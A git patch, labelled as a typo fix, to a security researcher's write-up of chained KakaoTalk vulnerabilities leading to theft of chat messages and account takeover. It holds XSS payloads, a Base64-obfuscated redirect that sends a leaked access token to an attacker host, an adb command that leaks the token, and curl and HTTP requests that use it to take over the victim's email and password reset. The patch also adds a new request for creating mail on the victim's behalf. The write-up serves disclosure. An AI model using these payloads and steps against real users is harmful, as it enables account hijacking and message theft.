From 176602b4f9a713bbd92bddb2d9691a1abb61101c Mon Sep 17 00:00:00 2001
From: stulle123 <stulle123@foo.bar>
Date: Tue, 5 Dec 2023 10:18:22 +0100
Subject: [PATCH] Fix typos and spelling

---
 FINDINGS.md | 59 ++++++++++++++++++++++++++++++++++++++---------------
 1 file changed, 42 insertions(+), 17 deletions(-)

diff --git a/FINDINGS.md b/FINDINGS.md
index 973a5b9..c8a48cc 100644
--- a/FINDINGS.md
+++ b/FINDINGS.md
@@ -13,7 +13,7 @@
 - [Appendix](#appendix)
   - [ffuf](#brute-forcing-with-ffuf)
 
-In KakaoTalk `10.3.4` there are a couple of low-hanging fruit vulnerabilities which when combined together allow an attacker to steal another user's chat messages.
+In KakaoTalk `10.4.3` there are a couple of low-hanging fruit vulnerabilities which when combined together allow an attacker to steal another user's chat messages.
 
 In the following we describe the vulnerabilities in detail and present a [PoC](#poc) at the end.
 
@@ -69,19 +69,19 @@ Maybe there's an Open Redirect or XSS issue on `https://buy.kakao.com` so that w
 
 ## URL Redirect to XSS
 
-While digging into `https://buy.kakao.com` I identified the endpoint `https://buy.kakao.com/auth/0/cleanFrontRedirect?returnUrl=` which allows to redirect to any `kakao.com` domain. This vastly increased my chances to find a XSS flaw as there are many many subdomains under `kakao.com`.
+While digging into `https://buy.kakao.com` we identified the endpoint `https://buy.kakao.com/auth/0/cleanFrontRedirect?returnUrl=` which allowed to redirect to any `kakao.com` domain. This vastly increased our chances to find a XSS flaw as there are many many subdomains under `kakao.com`.
 
-To find a vulnerable website I just googled for `site:*.kakao.com inurl:search -site:developers.kakao.com -site:devtalk.kakao.com` and found `https://m.shoppinghow.kakao.com/m/search/q/yyqw6t29`. The string `yyqw6t29` looked like a [DOM Invader canary](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/settings/canary) to me, so I investigated further. Funny enough, there was already a Stored XSS as `https://m.shoppinghow.kakao.com/m/search/q/alert(1)` popped up an alert box. Searching the DOM brought up the Stored XSS payload `[해외]test "><svg/onload=alert(1);// Pullover Hoodie`.
+To find a vulnerable website we just googled for `site:*.kakao.com inurl:search -site:developers.kakao.com -site:devtalk.kakao.com` and found `https://m.shoppinghow.kakao.com/m/search/q/yyqw6t29`. The string `yyqw6t29` looked like a [DOM Invader canary](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/settings/canary) to us, so we investigated further. Funny enough, there was already a Stored XSS as `https://m.shoppinghow.kakao.com/m/search/q/alert(1)` popped up an alert box. Searching the DOM brought up the responsible Stored XSS payload `[해외]test "><svg/onload=alert(1);// Pullover Hoodie`.
 
-Continuing to browse the DOM I discovered another [endpoint](https://m.shoppinghow.kakao.com/m/product/V25084142918/q:alert(1)) which was then vulnerable to DOM XSS. Testing the URL with Burp Suite's DOM Invader quickly brought up a couple of issues and eventually the PoC XSS payload turned out to be as simple as `"><img src=x onerror=alert(1);>`.
+Continuing to browse the DOM we discovered another [endpoint](https://m.shoppinghow.kakao.com/m/product/V25084142918/q:alert(1)) which was then vulnerable to DOM XSS. Testing the URL with Burp Suite's DOM Invader quickly brought up a couple of issues and eventually the PoC XSS payload turned out to be as simple as `"><img src=x onerror=alert(1);>`.
 
-At this point we could run arbitrary Javascript in the `CommerceBuyActivity` WebView when the user clicks on a deep link such as `kakaotalk://auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/V25084142918/q:"><img src=x onerror=alert(1);>`.
+At this point we could run arbitrary Javascript in the `CommerceBuyActivity` WebView when the user clicked on a deep link such as `kakaotalk://auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/V25084142918/q:"><img src=x onerror=alert(1);>`.
 
 Since the `CommerceBuyActivity` supports the `intent://` scheme we could now start arbitrary non-exported app components 🥳
 
 ## MyProfileSettingsActivity
 
-Digging further, we identified the non-exported `MyProfileSettingsActivity` WebView which had a couple of issues.
+Digging further, we identified the non-exported `MyProfileSettingsActivity` WebView which had a couple of issues, too.
 
 First of, it allowed to load arbitrary URLs:
 
@@ -124,7 +124,7 @@ public final void onCreate(Bundle bundle) {
 }
 ```
 
-This includes `javascript://` and `data://` schemes which allow to run Javascript. Also, it supports `content://` URLs, so a URL such as `content://com.kakao.talk.FileProvider/onepass/PersistedInstallation.W0RFRkFVTFRd+MTo1NTIzNjczMDMxMzc6YW5kcm9pZDpiNjUwZmVmOGI2MDY1MzVm.json` opens KakaoTalk's Firebase Installation configuration in the `MyProfileSettingsActivity` WebView.
+This included `javascript://` and `data://` schemes which allow to run Javascript. Also, it supported `content://` URLs, so a URL such as `content://com.kakao.talk.FileProvider/onepass/PersistedInstallation.W0RFRkFVTFRd+MTo1NTIzNjczMDMxMzc6YW5kcm9pZDpiNjUwZmVmOGI2MDY1MzVm.json` opens KakaoTalk's Firebase Installation configuration in the `MyProfileSettingsActivity` WebView.
 
 Last but not least, it leaked an access token in the `Authorization` HTTP header. For example, a command such as `adb shell am start "intent:#Intent\;component=com.kakao.talk/.activity.setting.MyProfileSettingsActivity\;S.EXTRA_URL=https://foo.bar\;end"` would send the token to `https://foo.bar`.
 
@@ -142,18 +142,18 @@ Let's break it down:
 
 - `kakaotalk://buy` fires up `CommerceBuyActivity`
 - `/auth/0/cleanFrontRedirect?returnUrl=` "compiles" to `https://buy.kakao.com/auth/0/cleanFrontRedirect?returnUrl=` and redirects to any `kakao.com` domain
-- `https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:` has the XSS issue
+- `https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:` had the XSS issue
 - `"><img src=x onerror="document.location=atob('aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUvZm9vLmh0bWw=');">` is the XSS payload. We had to Base64 encode the "attacker URL" to bypass some sanitization checks.
 
-Now, in possession of the access token what could we do with it? We could use it takeover a victim's Kakao Mail account used for KakaoTalk registration.
+Now, in possession of the access token what could we do with it? Well, what about using it to takeover the victim's Kakao Mail account that was used for KakaoTalk registration!
 
-**TODO** If the victim doesn't have a Kakao Mail account it *might* be possible to create a new Kakao Mail account on her/his behalf. This is interesting because creating a new Kakao Mail account overwrites the user's previous registered email-address with no additional checks.
+> **_NOTE:_** If the victim doesn't have a Kakao Mail account it's possible to create a new Kakao Mail account on her/his behalf. This is interesting because creating a new Kakao Mail account overwrites the user's previous registered email-address with no additional checks. Scroll to the end of this section to check out how to do that.
 
 First, we needed to check whether the victim actually uses Kakao Mail:
 
 ```bash
 curl -i -s -k -X $'GET' \
-    -H $'Host: katalk.kakao.com' -H $'Accept-Language: en' -H $'User-Agent: KT/10.3.8 An/11 en' -H $'Authorization: 601d3b6236df486f9908196d375ae9e800000017007543214660010AJixY80Cv2-738b6ba0d2e81934d67f298b1c77f2e5d71dcd1ff77b85563f0cd921b1a98f1e' -H $'A: android/9.5.0/en' -H $'C: a327a1ad-b417-499a-abf7-48da89076e7c' -H $'Accept-Encoding: json, deflate, br' -H $'Connection: close' \
+    -H $'Host: katalk.kakao.com' -H $'Accept-Language: en' -H $'User-Agent: KT/10.4.3 An/11 en' -H $'Authorization: 601d3b6236df486f9908196d375ae9e800000017007543214660010AJixY80Cv2-738b6ba0d2e81934d67f298b1c77f2e5d71dcd1ff77b85563f0cd921b1a98f1e' -H $'A: android/9.5.0/en' -H $'C: a327a1ad-b417-499a-abf7-48da89076e7c' -H $'Accept-Encoding: json, deflate, br' -H $'Connection: close' \
     $'https://katalk.kakao.com/android/account/more_settings.json?os_version=30&model=SDK_GPHONE_ARM64&since=1693786891&lang=en&vc=2610380&email=2&adid=&adid_status=-1'
 ```
 
@@ -161,7 +161,7 @@ Next, we had to grab another access token to access Kakao Mail:
 
 ```bash
 curl -i -s -k -X $'POST' \
-    -H $'Host: api-account.kakao.com' -H $'Accept-Language: en' -H $'User-Agent: KT/10.3.8 An/11 en' -H $'Authorization: 601d3b6236df486f9908196d375ae9e800000017007543214660010AJixY80Cv2-738b6ba0d2e81934d67f298b1c77f2e5d71dcd1ff77b85563f0cd921b1a98f1e' -H $'A: android/10.3.8/en' -H $'C: 2cc348d0-b7f7-464c-b72b-1e3f66a04362' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 174' -H $'Accept-Encoding: json, deflate, br' -H $'Connection: close' \
+    -H $'Host: api-account.kakao.com' -H $'Accept-Language: en' -H $'User-Agent: KT/10.4.3 An/11 en' -H $'Authorization: 601d3b6236df486f9908196d375ae9e800000017007543214660010AJixY80Cv2-738b6ba0d2e81934d67f298b1c77f2e5d71dcd1ff77b85563f0cd921b1a98f1e' -H $'A: android/10.4.3/en' -H $'C: 2cc348d0-b7f7-464c-b72b-1e3f66a04362' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 174' -H $'Accept-Encoding: json, deflate, br' -H $'Connection: close' \
     --data-binary $'key_type=talk_session_info&key=601d3b6236df486f9908196d375ae9e800000017007543214660010AJixY80Cv2-738b6ba0d2e81934d67f298b1c77f2e5d71dcd1ff77b85563f0cd921b1a98f1e&referer=talk' \
     $'https://api-account.kakao.com/v1/auth/tgt'
 ```
@@ -186,7 +186,7 @@ Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Linux; Android 11; sdk_gphone_arm64 Build/RSR1.210722.013.A6; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/91.0.4472.114 Mobile Safari/537.36;KAKAOTALK 2610380
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
 Km-Viewer-Ver: 1
-Kakaotalk-Agent: os=android;osver=30;appver=10.3.8;lang=en;dtype=1;idiom=phone;device=SDK_GPHONE_ARM64
+Kakaotalk-Agent: os=android;osver=30;appver=10.4.3;lang=en;dtype=1;idiom=phone;device=SDK_GPHONE_ARM64
 Ka-Tgt: 5e09081b0cce35288422a0b6589ef860
 X-Requested-With: com.kakao.talk
 Sec-Fetch-Site: none
@@ -196,7 +196,32 @@ Sec-Fetch-Dest: document
 Accept-Encoding: gzip, deflate, br
 Accept-Language: en-US,en;q=0.9
 ```
-4. Right-click in the request window, select `Request in browser > In original session` and copy the URL into Burp's browser.
+4. Click on `Send` and confirm the target details
+5. Right-click in the request window, select `Request in browser > In original session` and copy the URL into Burp's browser.
+
+As pointed out above we can also create a new Kakao Mail account on the user's behalf. Just repeat the same steps with Burp using the following HTTP request (adapt the `Authorization` header):
+
+```
+GET /kakao_mail/main?continue=https://talk.mail.kakao.com HTTP/1.1
+Host: auth.kakao.com
+Pragma: no-cache
+Cache-Control: no-cache
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Linux; Android 11; sdk_gphone_arm64 Build/RSR1.210722.013.A6; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/91.0.4472.114 Mobile Safari/537.36;KAKAOTALK 2610430
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Authorization: 601d3b6236df486f9908196d375ae9e800000017007543214660010AJixY80Cv2-738b6ba0d2e81934d67f298b1c77f2e5d71dcd1ff77b85563f0cd921b1a98f1e
+Http_a: android/10.4.3/en
+X-Requested-With: com.kakao.talk
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+Connection: close
+```
+
+When creating a new email address tick the box `Set As Primary Email`.
 
 ## KakaoTalk Password Reset with Burp
 
@@ -204,7 +229,7 @@ Since we could now access the victim's Kakao Mail account a password reset was t
 
 ```bash
 curl -i -s -k -X $'GET' \
-    -H $'Host: katalk.kakao.com' -H $'Accept-Language: en' -H $'User-Agent: KT/10.3.8 An/11 en' -H $'Authorization: 601d3b6236df486f9908196d375ae9e800000017007543214660010AJixY80Cv2-738b6ba0d2e81934d67f298b1c77f2e5d71dcd1ff77b85563f0cd921b1a98f1e' -H $'A: android/9.5.0/en' -H $'C: a327a1ad-b417-499a-abf7-48da89076e7c' -H $'Accept-Encoding: json, deflate, br' -H $'Connection: close' \
+    -H $'Host: katalk.kakao.com' -H $'Accept-Language: en' -H $'User-Agent: KT/10.4.3 An/11 en' -H $'Authorization: 601d3b6236df486f9908196d375ae9e800000017007543214660010AJixY80Cv2-738b6ba0d2e81934d67f298b1c77f2e5d71dcd1ff77b85563f0cd921b1a98f1e' -H $'A: android/9.5.0/en' -H $'C: a327a1ad-b417-499a-abf7-48da89076e7c' -H $'Accept-Encoding: json, deflate, br' -H $'Connection: close' \
     $'https://katalk.kakao.com/android/account/more_settings.json?os_version=30&model=SDK_GPHONE_ARM64&since=1693786891&lang=en&vc=2610380&email=2&adid=&adid_status=-1'
 ```
 
@@ -294,7 +319,7 @@ Luckily, we can still use the gathered access token to grab the pin number from
 
 ```bash
 curl -i -s -k -X $'GET' \
-    -H $'Host: katalk.kakao.com' -H $'Accept-Language: en' -H $'User-Agent: KT/10.3.8 An/11 en' -H $'Authorization: 601d3b6236df486f9908196d375ae9e800000017007543214660010AJixY80Cv2-738b6ba0d2e81934d67f298b1c77f2e5d71dcd1ff77b85563f0cd921b1a98f1e' -H $'A: android/10.3.8/en' -H $'C: 48d380e2-4513-44a7-b0df-4408c8091502' -H $'Accept-Encoding: json, deflate, br' -H $'Connection: close' \
+    -H $'Host: katalk.kakao.com' -H $'Accept-Language: en' -H $'User-Agent: KT/10.4.3 An/11 en' -H $'Authorization: 601d3b6236df486f9908196d375ae9e800000017007543214660010AJixY80Cv2-738b6ba0d2e81934d67f298b1c77f2e5d71dcd1ff77b85563f0cd921b1a98f1e' -H $'A: android/10.4.3/en' -H $'C: 48d380e2-4513-44a7-b0df-4408c8091502' -H $'Accept-Encoding: json, deflate, br' -H $'Connection: close' \
     $'https://katalk.kakao.com/android/sub_device/settings/info.json'
 ```
 
@@ -304,7 +329,7 @@ Example response:
 {"status":0,"isVerified":true,"passcode":"8825"}
 ```
 
-And you're in! Profit 🥳🥳🥳
+And we're in! Profit 🥳🥳🥳
 
 ## Appendix